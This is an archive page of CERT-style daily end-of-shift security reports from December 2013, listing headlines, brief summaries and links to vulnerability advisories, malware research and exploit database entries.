added to the Dr.Web virus database at the beginning of the month. --------------------------------------------- http://news.drweb.com/show/?i=4122&lng=en&c=9 *** DSA-2812 samba *** --------------------------------------------- http://www.debian.org/security/2013/dsa-2812 *** RSA Security Analytics Core Can Be Accessed By Remote Users *** --------------------------------------------- http://www.securitytracker.com/id/1029446 *** pam_userdb password hashes arent compared case-sensitive *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120069 *** TYPO3-CORE-SA-2013-004: Multiple Vulnerabilities in TYPO3 CMS *** --------------------------------------------- http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa… *** McAfee Email Gateway 7.6 multiple vulnerabilities *** --------------------------------------------- http://seclists.org/fulldisclosure/2013/Dec/18

1 0

Tageszusammenfassung - Montag 9-12-2013
by Daily end-of-shift report 09 Dec '13

09 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Freitag 06-12-2013 18:00 − Montag 09-12-2013 18:00 Handler: Matthias Fraidl Co-Handler: n/a *** RuggedCom ROS Multiple Vulnerabilities *** --------------------------------------------- Siemens has reported to NCCIC/ICS-CERT multiple vulnerabilities in the RuggedCom Rugged OS (ROS). Siemens has produced a firmware update that mitigates these vulnerabilities. Exploitation of these vulnerabilities could allow an attacker to hijack an active Web session and access administrative functions on the devices without proper authorization. These vulnerabilities could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-340-01 *** The Biggest Security Stories of 2013 *** --------------------------------------------- As 2013 comes to a close, security experts are looking back at the major stories and developments of the year, including the Edward Snowden NSA leaks and major malware attacks. In this video, Vitaly Kamluk of Kaspersky Lab examines the biggest security news of 2013 and talks about the lasting effects they may have. --------------------------------------------- http://threatpost.com/the-biggest-security-stories-of-2013/103125 *** Microsoft teams up with Feds, Europol in ZeroAccess botnet zombie hunt *** --------------------------------------------- Just dont bork our crim-busting honeypots again Microsoft has teamed up with the FBI to launch a renewed attempt to disrupt the operations of the infamous ZeroAccess botnet. --------------------------------------------- http://www.theregister.co.uk/2013/12/06/zeroaccess_zombienet_takedown/ *** FAQ: Pony Malware Payload Discovery *** --------------------------------------------- Our team´s discovery of the spoils of yet another instance of Pony 1.9 has kept us busy the past couple of days. We´ve enjoyed explaining our discovery to journalists and trying our best to answer the questions that arise over social networks and email with each publication of a story. A lot of those questions tend to be similar. --------------------------------------------- http://blog.spiderlabs.com/2013/12/faq-pony-malware-payload-discovery.html *** 2014 Predictions: Blurring Boundaries *** --------------------------------------------- The past year has been an interesting one in the world of cyber security. Mobile malware has become a large-scale threat, government surveillance has users asking "does privacy still exist?", cybercrime continues to steal money from individuals and businesses, and new targets for hackers like AIS and SCADA have been identified. 2013 was many things, but boring was not one of them. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/2014-predictions… *** The state of targeted attacks *** --------------------------------------------- Trusteer announced the results of a recent study on the State of Targeted Attacks, which took into consideration the feedback from over 750 IT and IT security practitioners who have involvement in defensive efforts against APTs launched at their organisations. --------------------------------------------- http://www.net-security.org/secworld.php?id=16059 *** Android-Apps: Sicherheitslücke durch fehlerhafte SSL-Prüfung *** --------------------------------------------- Das Fraunhofer-Institut für Sichere Informationstechnologie hat mehrere Android-Apps ausfindig gemacht, bei denen die fehlerhafte Prüfung des SSL-Zertifikats den Zugriff auf Zugangsdaten möglich macht. Nur etwa die Hälfte aller kontaktierten Hersteller hat die Sicherheitslücke bisher geschlossen. --------------------------------------------- http://www.golem.de/news/android-apps-sicherheitsluecke-durch-fehlerhafte-s… *** The world´s most dangerous mobile phone spying app just moved into the tablet and iPad market *** --------------------------------------------- The evolution of GPS and the smart-phone market has spawned a macabre industry of surveillance apps designed to be covertly installed onto the cellphones of vulnerable employees, business associates, partners and children. --------------------------------------------- http://www.privacysurgeon.org/blog/incision/the-worlds-most-dangerous-mobil… *** Bypassing Windows AppLocker using a Time of Check Time of Use vulnerability *** --------------------------------------------- Windows AppLocker is Microsoft´s replacement to Software Restriction Policies in Windows 7, Windows 8, Server 2008 and Server 2012. Windows AppLocker has been promoted by several government agencies such as the National Security Agency and the New Zealand National Cyber Security Center as an effective mechanism to combat the execution of unauthorized code on modern Microsoft Windows based systems. --------------------------------------------- http://www.nccgroup.com/media/495634/2013-12-04_-_ncc_-_technical_paper_-_b… *** Automater - IP URL and MD5 OSINT Analysis *** --------------------------------------------- Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal. --------------------------------------------- http://www.tekdefense.com/automater/ *** Drei GIMP-Lücken auf einen Streich *** --------------------------------------------- Das Sicherheits-Team von Red Hat hat drei Speicherverwaltungsprobleme in der Bildverarbeitungssoftware GIMP gefunden und beseitigt, die dazu ausgenutzt werden könnten, dem Benutzer Schadcode unterzuschieben. --------------------------------------------- http://www.heise.de/security/meldung/Drei-GIMP-Luecken-auf-einen-Streich-20… *** Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail of client-side exploits - part two *** --------------------------------------------- Ever since we exposed and profiled the evasive, multi-hop, mass iframe campaign that affected thousands of Web sites in November, we continued to monitor it, believing that the cybercriminal(s) behind it, would continue operating it, basically switching to new infrastructure once the one exposed in the post got logically blacklisted, thereby undermining the impact of the campaign internationally. --------------------------------------------- http://www.webroot.com/blog/2013/12/09/malicious-multi-hop-iframe-campaign-… *** Putting malware in the picture *** --------------------------------------------- Spammers actively spread malware using fake notifications on behalf of various financial and banking institutions, booking and delivery services and other companies. The arsenal of tricks used by cybercriminals is constantly being updated. In particular, in recent years we have registered a number of English- and German-language mass mailings in which the attackers try to hide malware under photos and pictures. --------------------------------------------- https://www.securelist.com/en/blog/8159/Putting_malware_in_the_picture *** [webapps] - Zimbra 0day exploit / Privilegie escalation via LFI *** --------------------------------------------- http://www.exploit-db.com/exploits/30085 *** D-Link DSR Router Remote Root Shell Exploit *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120055 *** WordPress DZS Video Gallery 3.1.3 Remote File Disclosure *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120050 *** cURL Certificate Validation Flaw Lets Remote Users Spoof SSL Servers *** --------------------------------------------- http://www.securitytracker.com/id/1029434 *** Security Bulletin: Multiple Security vulnerability fix for IBM Tivoli Storage Manager Administration Center (CVE-2012-5081, CVE-2013-0169, CVE-2013-0443). *** --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Steinberg MyMp3PRO SEH buffer overflow *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89468

1 0

Tageszusammenfassung - Freitag 6-12-2013
by Daily end-of-shift report 06 Dec '13

06 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 05-12-2013 18:00 − Freitag 06-12-2013 18:00 Handler: Stephan Richter Co-Handler: Robert Waldner *** Advance Notification Service for December 2013 Security Bulletin Release *** --------------------------------------------- Today we're providing advance notification for the release of 11 bulletins, five Critical and six Important, for December 2013. The Critical updates address vulnerabilities in Internet Explorer, Windows, Microsoft Exchange and GDI+. The Critical update for GDI+ fully addresses the publicly disclosed issue described in Security Advisory 2896666. This release won't include an update for the issue described in Security Advisory 2914486. We're still working to develop a security... --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2013/12/05/advance-notification-ser… *** Google Docs Scam Stealing Passwords *** --------------------------------------------- Scammers are up to mischief again by tricking users into clicking false webmail widgets. The core goal of any phishing attempt is to compromise the victims access to a particular service. Usually this is done by posing as the service the attacker wants to hijack from the victim, and sending the username and password information back to the attacker. Ive seen plenty phishing schemes in the --------------------------------------------- http://research.zscaler.com/2013/12/google-docs-scam-stealing-passwords-in.… *** Study finds zero-day vulnerabilities abound in popular software *** --------------------------------------------- Organizations selling exploits for vulnerabilities in software from major companies including Microsoft, Apple, Oracle, and Adobe --------------------------------------------- http://www.csoonline.com/article/744307/study-finds-zero-day-vulnerabilitie… *** EU cyber security Agency ENISA argues that better protection of SCADA Systems is needed *** --------------------------------------------- How long can we afford having critical infrastructures that use unpatched SCADA systems, the EU's cyber security Agency ENISA asks? ENISA argues that the EU Member States could proactively deploy patch management to enhance the security of SCADA systems. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/eu-cyber-security-agency-en… *** Hacking a Reporter: Sleepless Nights Outside a Brooklyn Brownstone (Part 3 of 3) *** --------------------------------------------- This post is the conclusion of a three-part series that goes into more depth about our experience hacking journalist Adam Penenberg, which resulted in an article on PandoDaily in October. Parts one and two detail the malware aspects of our hack with contributions from Josh Grunzweig, Matt Jakubowski and Daniel Chechik. I, Garret Picchioni (voted to be the bald hacker with a heart tattoo in the original article artwork), will discuss the details of the... --------------------------------------------- http://blog.spiderlabs.com/2013/12/hacking-a-reporter-sleepless-nights-outs… *** Weekly Metasploit Update: SAP and Silverlight *** --------------------------------------------- We've been all SAP all the time here in the Independent Nations of Metasploit, and expect to be for the rest of the week. You might recall that Metasploit exploit dev, Juan Vazquez published his SAP survey paper a little while back; on Tuesday, we did a moderated twitter chat on the hashtag #pwnSAP with the major SAP-focused Metasploit contributors Bruno Morrison, Chris John Riley, and Dave Hartley; and today (Thursday, December 5), Juan and I will be hosting a webcast on the various and sundry SAP exposures that Metasploit covers, and There Will Be Demos and Q&A, so it should be fun. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2013/12/05/weekly-me… *** CVE-2013-3346/5065 Technical Analysis *** --------------------------------------------- In our last post, we warned of a new Windows local privilege escalation vulnerability being used in the wild. We noted that the Windows bug (CVE-2013-5065) was exploited in conjunction with a patched Adobe Reader bug (CVE-2013-3346) to evade the... --------------------------------------------- http://www.fireeye.com/blog/technical/cyber-exploits/2013/12/cve-2013-33465… *** Security Bulletin: Multiple Security Vulnerabilities in IBM Sterling Control Center *** --------------------------------------------- A number of security vulnerabilities have been discovered in the Java Runtime Environment and the Cognos Business Intelligence components included in IBM SCC.CVE(s): CVE-2013-1557, CVE-2013-1478, CVE-2013-1571, CVE-2013-1500, CVE-2013-2988, CVE-2013-2978 and CVE-2013-0586 Affected product(s) and affected version(s): IBM InfoSphere Information Server Versions 8.0, 8.1, 8.5, 8.7, and 9.1 running on all platforms Refer to the following reference URLs for remediation and additional vulnerability... --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Security Bulletin: Multiple security vulnerabilities exist in IBM InfoSphere Information Server (CVE-2013-4066 and CVE-2013-4067) *** --------------------------------------------- Multiple security vulnerabilities exist in the IBM JRE that is shipped with the Rational Reporting for Development Intelligence (RRDI). The same security vulnerabilities also exist in the IBM Java SDK that is shipped with the IBM WebSphere Application Server (WAS). CVE(s): CVE-2013-4066 and CVE-2013-4067 Affected product(s) and affected version(s): IBM InfoSphere Information Server Versions 8.0, 8.1, 8.5, 8.7, and 9.1 running on all platforms Refer to the following reference URLs for... --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Sonicwall GMS 7.x Filter Bypass *** --------------------------------------------- Topic: Sonicwall GMS 7.x Filter Bypass Risk: Low Text:Document Title: Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability References (Source): == http... --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120048 *** VMware ESX Server Service Console Two Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/55917 *** SSA-568732 (Last Update 2013-12-06): Privilege Escalation in COMOS *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** WordPress JS Hotel Plugin "roomid" Cross-Site Scripting Vulnerability *** --------------------------------------------- https://secunia.com/advisories/55919 *** NVIDIA Graphics Drivers GPU Access Privilege Escalation Vulnerability *** --------------------------------------------- https://secunia.com/advisories/55904 *** HP-UX update for Java *** --------------------------------------------- https://secunia.com/advisories/55978 *** IBM Forms Viewer XFDL buffer overflow *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/87911

1 0

2026

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily